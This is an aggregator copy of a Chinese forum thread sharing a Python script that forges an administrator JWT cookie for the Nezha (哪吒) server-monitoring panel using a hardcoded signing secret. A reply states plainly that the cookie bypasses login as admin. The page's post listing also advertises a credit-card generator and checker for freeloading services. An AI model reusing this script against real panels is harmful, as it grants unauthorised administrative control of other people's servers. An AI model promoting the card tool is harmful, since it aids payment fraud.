惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V
Visual Studio Blog
Microsoft Azure Blog
Microsoft Azure Blog
WordPress大学
WordPress大学
小众软件
小众软件
Last Week in AI
Last Week in AI
月光博客
月光博客
博客园 - 聂微东
Recent Announcements
Recent Announcements
A
About on SuperTechFans
博客园 - 三生石上(FineUI控件)
V
V2EX
阮一峰的网络日志
阮一峰的网络日志
博客园 - Franky
云风的 BLOG
云风的 BLOG
量子位
N
Netflix TechBlog - Medium
Hugging Face - Blog
Hugging Face - Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
J
Java Code Geeks
博客园 - 司徒正美
S
SegmentFault 最新的问题
有赞技术团队
有赞技术团队
Google DeepMind News
Google DeepMind News
宝玉的分享
宝玉的分享

NodeLoc - 最新帖子

NodeLoc 新AI中转站 注册送$5 0.25倍率 gpt-5.5、gpt-image-2 脱口秀讲得一般,腿真的不错 Skyline 🏷️ Singapore 解锁🐔 初体 [已开奖]【抽奖】魔戒不限时间订阅 给大家推荐个在线信用卡生成,还可以检测有效性,还能检测出是否有钱的信用卡,亲测有效,已经白嫖好多平台服务,有需要的点个红心哦 双光纤怎么处理 NodeLoc 突然想到一个问题,DeepSeek靠什么盈利? z.org要停止服务了,以后只有@elektrine.com了 带免税号出OVH IE区法国机房新款ks-le-a 6T大盘16G内存CPU带核显不限流量G口月付仅9.99欧元独服大盘机(物理服务器) ClawCloud 宣布关停 VPS、VDS 及相关托管业务 有个edu邮箱死活抽不出去了,直接送了。如果你愿意的话就给大家发个红包吧。 通过 Google Workspace 实现 14 人民币每年购买 com net 等顶级域名(续费同价) 【告别封号焦虑】推荐一个防关联神器——>指纹浏览器 Geelinx 日本建站🐔开售 怎么还是硬编码啊@FurryAM [UlziX]关于用户反馈回应 [UlziX]新加坡2区提醒 避雷UlziX+细说几大罪状(再次更新) 打发无聊的儿童节,超炫跑酷(粗制滥造) 白嫖机场100G一个月 之前白嫖的cyou域名怎么绑定到cf啊 零零七IDC 每月免单活动 给大家推荐一个机场 机器都是大厂的服务器六一节做活动5折 新gTLD来了 .PAY giffgaff 还有2张带活动的 出一个少一个 Host2Play 自动续期脚本 HidenCloud 自动续期 🎁 免费试用|FluxISP 纯净住宅 IP,指纹浏览器 / 跨境 / 社媒必备
哪吒探针公鸡Python脚本
James (James) · 2026-06-14 · via NodeLoc - 最新帖子
import base64
import json
import hmac
import hashlib
import time

# 配置参数
secret_key = b"brTValLD5zgip27aeUVnxPwbumOX5ZDmnkFK03G7aQuIThhCQzD3MOVDuJgCpj6dXCCKwybN8oY4x73X0AhUmffY38nyHcW75RXAyz89ywDiq5JWKHdvJprqZSmhpvWJwzuer4eiIyQJ4amx7dfdSvmJKsq2HO3ToR63sv9dSbMx19dAmKnCt0enG0GCCztp8ZPqCoplPrIUtem1yT6nkFwT3qhaotjUj0yOw8ACLQuzIRQhS0V3NdlgcHsx3aEHEvunZXsGw3nOBnTb1NU2SpkvDpXcBupFQwPB2VW4dsco5CTUhLNrCcIFw0DGtTZIezpx8xRvOgO7B3VncwWRtFeZhrmwNLWoPpqyVfdrxoHeDIksccfTkf8WheUxn0HEh3sJRxqCrKmUf2LabWBqheQ4g7LrLL7ybrbl5wK23KXJLwUWiLaSLPaRChumf3GUvvBgYmeqF30y7L10dvf8m4jNVikxfmtZKyEwvFULLQfVwiyZ5F2ETlg5q7IwGoBiSFmscuADJQ0zHefnwsrLMAOuQjvOM3gBNhNE3wVMLVWBGKkHdJl7p2CabvlisZl3V6pthuA3TfLrMCEbuefvgeGKpmY5djjBXh4HAw5eonabXKMSxsd5AaZM7eCsJiPccuLm6iixzaHjaLcVcO0NyGQDZgiaySaS8OMCWRj0wyroXLTMWAdRqwRXN7sqki493sCjLp6pGJ9fVCqDmreM7Zn4WGrYYQfzUxTi2RZj3zkXS6rOzHYUrq1CUjQKS4qaim4agkhbQ47JH3bNVBOxgya6Z898iU7E9WFIoAc2sVy7rWPq17EnbeFolm3tjRDp9yxelTGx3bykXSj1fcJ9kSvGPhgxnDl0PcICHBeUqBb4HYUy9fSzfOKVyTxlPfKfUpZOrpOGHIcqttJ8zDcW9IgYXmi6jtfqqOESvyfZVlwVLVHf88HlMtWE6x9UhwP4OS00GPnXrZNnoeoIWDnVjPdXNS2CIRDP0xjfQY9I7GXybzZsu8Uo5kPi3LfDkuoh"
header = {"alg": "HS256", "typ": "JWT"}
# 注意:user_id 必须是字符串 "1",不能是数字 1
payload = {
    "user_id": "1",
    "ip": "104.168.1.54",
    "exp": int(time.time()) + 31536000  # 过期时间设为 1 年后
}

# Base64Url 编码函数
def b64url_encode(data):
    return base64.urlsafe_b64encode(json.dumps(data, separators=(',', ':')).encode('utf-8')).replace(b'=', b'').decode('utf-8')

# 1. 编码 Header 和 Payload
encoded_header = b64url_encode(header)
encoded_payload = b64url_encode(payload)

# 2. 拼接为待签名字符串
signing_input = f"{encoded_header}.{encoded_payload}"

# 3. 使用 HMAC-SHA256 和 Secret Key 进行签名
signature = hmac.new(secret_key, signing_input.encode('utf-8'), hashlib.sha256).digest()
encoded_signature = base64.urlsafe_b64encode(signature).replace(b'=', b'').decode('utf-8')

# 4. 生成最终的 JWT Token
nz_jwt = f"{signing_input}.{encoded_signature}"

print(f"计算得出的 nz-jwt Cookie 值为:\n{nz_jwt}")

这段代码实际是在生成一个哪吒面板的管理员登录凭证:用已知的签名密钥,手工签发一个 user_id="1"(管理员)、有效期一年的 Token,塞进 Cookie 后就能以管理员身份绕过登录。

Mahmut_Udemy (Mahmut Udemy) 5

很遗憾,我也不知道。不过,能给我点个赞吗?

mdx233 (mdx233) 6

:xhj16:

TANGFAN (唐帆) 7

谢谢老大分享

supers (Supers) 8

测试了好像不行。